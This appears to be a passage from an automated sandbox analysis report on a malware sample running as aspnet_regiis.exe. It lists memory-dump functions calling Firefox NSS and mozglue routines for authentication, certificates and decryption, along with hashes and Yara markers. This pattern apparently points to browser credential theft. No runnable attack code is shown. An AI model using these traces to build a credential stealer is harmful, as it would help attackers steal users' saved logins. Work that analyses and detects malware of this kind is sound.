                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CBECD93,?), ref: 6CBECF67
                                                                                                                                                                              • SECITEM_CopyItem_Util.NSS3(?,00000000,6CBECD93,?,?,?,?,?,?,?,?,?,?,?,6CBECD93,?), ref: 6CBECF78
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4291907967-0
                                                                                                                                                                              • Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
                                                                                                                                                                              • Instruction ID: 52fda2ea89085ad304ba7c169253161c0e48fae7062796877e66f7a7a8204384
                                                                                                                                                                              • Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
                                                                                                                                                                              • Instruction Fuzzy Hash: 151196A5A0038457EB045FA66C41B6F79ECDF5C989F144439EC09D7742FB70DA0886E2
                                                                                                                                                                              Function 6CB98C00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CB98C1B
                                                                                                                                                                              • EnterCriticalSection.KERNEL32 ref: 6CB98C34
                                                                                                                                                                              • PL_ArenaAllocate.NSS3 ref: 6CB98C65
                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6CB98C9C
                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6CB98CB6
                                                                                                                                                                                • Part of subcall function 6CC2DD70: TlsGetValue.KERNEL32 ref: 6CC2DD8C
                                                                                                                                                                                • Part of subcall function 6CC2DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CC2DDB4
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
                                                                                                                                                                              • String ID: KRAM
                                                                                                                                                                              • API String ID: 4127063985-3815160215
                                                                                                                                                                              • Opcode ID: f6ce3bb67b5f8a1b361691080dd222e52f5d89aaa63c05dd56c4988a4db46450
                                                                                                                                                                              • Instruction ID: 790b4e4d59ce5260b5901760df2ab46c22052e946b62a0f1b08d326c01cb9501
                                                                                                                                                                              • Opcode Fuzzy Hash: f6ce3bb67b5f8a1b361691080dd222e52f5d89aaa63c05dd56c4988a4db46450
                                                                                                                                                                              • Instruction Fuzzy Hash: AA214CB1A05A418FD700AF78C484569BBF4FF46304F15897ED898CB711EB36E899CB92
                                                                                                                                                                              Function 6CC92C80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61stringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • PR_EnterMonitor.NSS3 ref: 6CC92CA0
                                                                                                                                                                              • PR_ExitMonitor.NSS3 ref: 6CC92CBE
                                                                                                                                                                              • calloc.MOZGLUE(00000001,00000014), ref: 6CC92CD1
                                                                                                                                                                              • strdup.MOZGLUE(?), ref: 6CC92CE1
                                                                                                                                                                              • PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6CC92D27
                                                                                                                                                                              Strings
                                                                                                                                                                              • Loaded library %s (static lib), xrefs: 6CC92D22
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Monitor$EnterExitPrintcallocstrdup
                                                                                                                                                                              • String ID: Loaded library %s (static lib)
                                                                                                                                                                              • API String ID: 3511436785-2186981405
                                                                                                                                                                              • Opcode ID: 0706b6cec8b95e81dfe07a0d1c072a6006533d2675bb9365391d69ad2f169aed
                                                                                                                                                                              • Instruction ID: 43f476b92df90f283a9568800ca5658b3daeb48170099838b88312fceff876ba
                                                                                                                                                                              • Opcode Fuzzy Hash: 0706b6cec8b95e81dfe07a0d1c072a6006533d2675bb9365391d69ad2f169aed
                                                                                                                                                                              • Instruction Fuzzy Hash: FA1127B1B012509FEB508F19D854A6677B8EB4A30DF04843DEC49C7B42F731E819CBA1
                                                                                                                                                                              Function 02A1FA24 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Name::operator+$NameName::
                                                                                                                                                                              • String ID: throw(
                                                                                                                                                                              • API String ID: 168861036-3159766648
                                                                                                                                                                              • Opcode ID: d66cd769d70596d179a2d35b20f37f4195bfb7d918af3bb002421a24523fa06c
                                                                                                                                                                              • Instruction ID: 638bcef9285b9ca7519867862b4e0812d40fe8cfe570ebdc84abc839d5703cb3
                                                                                                                                                                              • Opcode Fuzzy Hash: d66cd769d70596d179a2d35b20f37f4195bfb7d918af3bb002421a24523fa06c
                                                                                                                                                                              • Instruction Fuzzy Hash: 44018070A40348BEDF04EFA4D952EED7BB6EF44758F004099F902DB2A4DE70DA468B80
                                                                                                                                                                              Function 6CC22E50 Relevance: 9.3, APIs: 6, Instructions: 251COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,00000000), ref: 6CC23046
                                                                                                                                                                                • Part of subcall function 6CC0EE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6CC0EE85
                                                                                                                                                                              • PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6CBF7FFB), ref: 6CC2312A
                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CC23154
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CC22E8B
                                                                                                                                                                                • Part of subcall function 6CC2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC2C2BF
                                                                                                                                                                                • Part of subcall function 6CC0F110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6CBF9BFF,?,00000000,00000000), ref: 6CC0F134
                                                                                                                                                                              • memcpy.VCRUNTIME140(8B3C75C0,?,6CBF7FFA), ref: 6CC22EA4
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CC2317B
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Error$memcpy$K11_Value
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2334702667-0
                                                                                                                                                                              • Opcode ID: 54eca64e30f7cbd60d59bdf3d0d30a498705200dc361bcc6582f64a105f27f00
                                                                                                                                                                              • Instruction ID: 9bcbb0a29bcc752c0fd27814236f25fdd2cfdbd8bcde291854db06f36eee0385
                                                                                                                                                                              • Opcode Fuzzy Hash: 54eca64e30f7cbd60d59bdf3d0d30a498705200dc361bcc6582f64a105f27f00
                                                                                                                                                                              • Instruction Fuzzy Hash: 48A1BC71A002289FDB24CF54CC90BAAB7B5FF49318F048199E949A7741E735AE85CFA1
                                                                                                                                                                              Function 6CBECCF0 Relevance: 9.2, APIs: 6, Instructions: 171memorythreadCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 6CBEC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6CBEDAE2,?), ref: 6CBEC6C2
                                                                                                                                                                              • PR_Now.NSS3 ref: 6CBECD35
                                                                                                                                                                                • Part of subcall function 6CC49DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CC90A27), ref: 6CC49DC6
                                                                                                                                                                                • Part of subcall function 6CC49DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CC90A27), ref: 6CC49DD1
                                                                                                                                                                                • Part of subcall function 6CC49DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CC49DED
                                                                                                                                                                                • Part of subcall function 6CBD6C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CB81C6F,00000000,00000004,?,?), ref: 6CBD6C3F
                                                                                                                                                                              • PR_GetCurrentThread.NSS3 ref: 6CBECD54
                                                                                                                                                                                • Part of subcall function 6CC49BF0: TlsGetValue.KERNEL32(?,?,?,6CC90A75), ref: 6CC49C07
                                                                                                                                                                                • Part of subcall function 6CBD7260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CB81CCC,00000000,00000000,?,?), ref: 6CBD729F
                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CBECD9B
                                                                                                                                                                              • PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6CBECE0B
                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6CBECE2C
                                                                                                                                                                                • Part of subcall function 6CBE10C0: TlsGetValue.KERNEL32(?,6CB88802,00000000,00000008,?,6CB7EF74,00000000), ref: 6CBE10F3
                                                                                                                                                                                • Part of subcall function 6CBE10C0: EnterCriticalSection.KERNEL32(?,?,6CB88802,00000000,00000008,?,6CB7EF74,00000000), ref: 6CBE110C
                                                                                                                                                                                • Part of subcall function 6CBE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CB88802,00000000,00000008,?,6CB7EF74,00000000), ref: 6CBE1141
                                                                                                                                                                                • Part of subcall function 6CBE10C0: PR_Unlock.NSS3(?,?,?,6CB88802,00000000,00000008,?,6CB7EF74,00000000), ref: 6CBE1182
                                                                                                                                                                                • Part of subcall function 6CBE10C0: TlsGetValue.KERNEL32(?,6CB88802,00000000,00000008,?,6CB7EF74,00000000), ref: 6CBE119C
                                                                                                                                                                              • PORT_ArenaMark_Util.NSS3(00000000), ref: 6CBECE40
                                                                                                                                                                                • Part of subcall function 6CBE14C0: TlsGetValue.KERNEL32 ref: 6CBE14E0
                                                                                                                                                                                • Part of subcall function 6CBE14C0: EnterCriticalSection.KERNEL32 ref: 6CBE14F5
                                                                                                                                                                                • Part of subcall function 6CBE14C0: PR_Unlock.NSS3 ref: 6CBE150D
                                                                                                                                                                                • Part of subcall function 6CBECEE0: PORT_ArenaMark_Util.NSS3(?,6CBECD93,?), ref: 6CBECEEE
                                                                                                                                                                                • Part of subcall function 6CBECEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CBECD93,?), ref: 6CBECEFC
                                                                                                                                                                                • Part of subcall function 6CBECEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CBECD93,?), ref: 6CBECF0B
                                                                                                                                                                                • Part of subcall function 6CBECEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CBECD93,?), ref: 6CBECF1D
                                                                                                                                                                                • Part of subcall function 6CBECEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CBECD93,?), ref: 6CBECF47
                                                                                                                                                                                • Part of subcall function 6CBECEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CBECD93,?), ref: 6CBECF67
                                                                                                                                                                                • Part of subcall function 6CBECEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6CBECD93,?,?,?,?,?,?,?,?,?,?,?,6CBECD93,?), ref: 6CBECF78
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3748922049-0
                                                                                                                                                                              • Opcode ID: 6deadcc706be5993d841d55e0269193645a313f588c0cce98a27e592ee5e3a69
                                                                                                                                                                              • Instruction ID: 594d20f5b3736f5747dff1dde1150c7a47c7caf22947bea4943d13b60b46b14d
                                                                                                                                                                              • Opcode Fuzzy Hash: 6deadcc706be5993d841d55e0269193645a313f588c0cce98a27e592ee5e3a69
                                                                                                                                                                              • Instruction Fuzzy Hash: A451B0B2A002509FEB10DF69DC40BAA7BE4EF4CB88F250524D815A7B41EB35FD05CB92
                                                                                                                                                                              Function 6CBBEEF0 Relevance: 9.1, APIs: 6, Instructions: 124threadCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6CBBEF38
                                                                                                                                                                                • Part of subcall function 6CBA9520: PK11_IsLoggedIn.NSS3(00000000,?,6CBD379E,?,00000001,?), ref: 6CBA9542
                                                                                                                                                                              • PK11_Authenticate.NSS3(?,00000001,?), ref: 6CBBEF53
                                                                                                                                                                                • Part of subcall function 6CBC4C20: TlsGetValue.KERNEL32 ref: 6CBC4C4C
                                                                                                                                                                                • Part of subcall function 6CBC4C20: EnterCriticalSection.KERNEL32(?), ref: 6CBC4C60
                                                                                                                                                                                • Part of subcall function 6CBC4C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CBC4CA1
                                                                                                                                                                                • Part of subcall function 6CBC4C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6CBC4CBE
                                                                                                                                                                                • Part of subcall function 6CBC4C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CBC4CD2
                                                                                                                                                                                • Part of subcall function 6CBC4C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBC4D3A
                                                                                                                                                                              • PR_GetCurrentThread.NSS3 ref: 6CBBEF9E
                                                                                                                                                                                • Part of subcall function 6CC49BF0: TlsGetValue.KERNEL32(?,?,?,6CC90A75), ref: 6CC49C07
                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CBBEFC3
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CBBF016
                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CBBF022
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2459274275-0
                                                                                                                                                                              • Opcode ID: c2c9a501ece5e6d98c010663f0b065b87e455d8ea5ffcb3b1bb57223a0c2be3f
                                                                                                                                                                              • Instruction ID: fde44eeeb63cdb6d7cbf66e826207ccc938e6a9393845e6c856fc18425268009
                                                                                                                                                                              • Opcode Fuzzy Hash: c2c9a501ece5e6d98c010663f0b065b87e455d8ea5ffcb3b1bb57223a0c2be3f
                                                                                                                                                                              • Instruction Fuzzy Hash: 39419375E00249ABDF018FA9DC85BEE7BB9EF48358F004025F914A6360EB71D915CBA1
                                                                                                                                                                              Function 02A13259 Relevance: 9.1, APIs: 6, Instructions: 110stringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: strtok_s
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3330995566-0
                                                                                                                                                                              • Opcode ID: c3137cf1eebb8a399977d60dba3102138ab9fea0ad234b380e132c0ce25d9e3c
                                                                                                                                                                              • Instruction ID: 6ca600c257dd490451991c927a688c668cdfb0aa92b9347b237c74408e87d1ef
                                                                                                                                                                              • Opcode Fuzzy Hash: c3137cf1eebb8a399977d60dba3102138ab9fea0ad234b380e132c0ce25d9e3c
                                                                                                                                                                              • Instruction Fuzzy Hash: 0731CEB1E01215EFDF199F68C8C4B69BBBCBB48625F4054D9E806EB091EF34C6508B48
                                                                                                                                                                              Function 6CB92E60 Relevance: 9.1, APIs: 6, Instructions: 105COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6CB82D1A), ref: 6CB92E7E
                                                                                                                                                                                • Part of subcall function 6CBE07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CB88298,?,?,?,6CB7FCE5,?), ref: 6CBE07BF
                                                                                                                                                                                • Part of subcall function 6CBE07B0: PL_HashTableLookup.NSS3(?,?), ref: 6CBE07E6
                                                                                                                                                                                • Part of subcall function 6CBE07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CBE081B
                                                                                                                                                                                • Part of subcall function 6CBE07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CBE0825
                                                                                                                                                                              • PR_Now.NSS3 ref: 6CB92EDF
                                                                                                                                                                              • CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6CB92EE9
                                                                                                                                                                              • SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6CB82D1A), ref: 6CB92F01
                                                                                                                                                                              • CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6CB82D1A), ref: 6CB92F50
                                                                                                                                                                              • SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6CB92F81
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 287051776-0
                                                                                                                                                                              • Opcode ID: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
                                                                                                                                                                              • Instruction ID: bbfa0ea5de8b7865c948a1e1878c545dbab1e8915f2acc91c77731985ee141e3
                                                                                                                                                                              • Opcode Fuzzy Hash: 6b467407cb95a1ae026b0ee79dd1b2f7e38d058143e2b848c32e4eb652019a89
                                                                                                                                                                              • Instruction Fuzzy Hash: D9310471D011C087EF10C655DC8CFBE7265EB82318F644579D41A97AD0EB31984ACA53
                                                                                                                                                                              Function 6CB80E00 Relevance: 9.1, APIs: 6, Instructions: 101memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
